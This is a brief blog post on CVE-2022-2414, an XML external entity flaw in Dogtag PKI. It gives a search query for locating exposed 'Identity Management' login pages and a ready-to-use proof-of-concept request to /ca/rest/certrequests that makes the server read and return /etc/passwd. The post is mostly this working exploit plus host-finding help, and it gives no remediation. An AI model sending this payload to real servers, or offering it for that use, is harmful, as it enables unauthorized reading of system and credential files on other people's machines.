Post

Dogtag Pki Xml Entity Injection Vulnerability Cve 2022 2414

Posted
By Rhy0z
1 min read
Dogtag Pki Xml Entity Injection Vulnerability Cve 2022 2414

Dogtag PKI XML entity injection vulnerability CVE-2022-2414

Vulnerability Description

Dogtag PKI’s XML parser has a security vulnerability that can cause XML external entity (XXE) attacks when accessing an external entity while analyzing an XML document.

Vulnerability Impact

Dogtag PKI

Network surveying and mapping

title=”Identity Management”

Vulnerability reappears

Login page

img

Verify POC

1
2
3
4
5
6
7
8
9

POST /ca/rest/certrequests
Content-Type: application/xml

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
  <Attributes/>
  <ProfileID>&ent;</ProfileID>
</CertEnrollmentRequest>

img

This post is licensed under CC BY 4.0 by the author.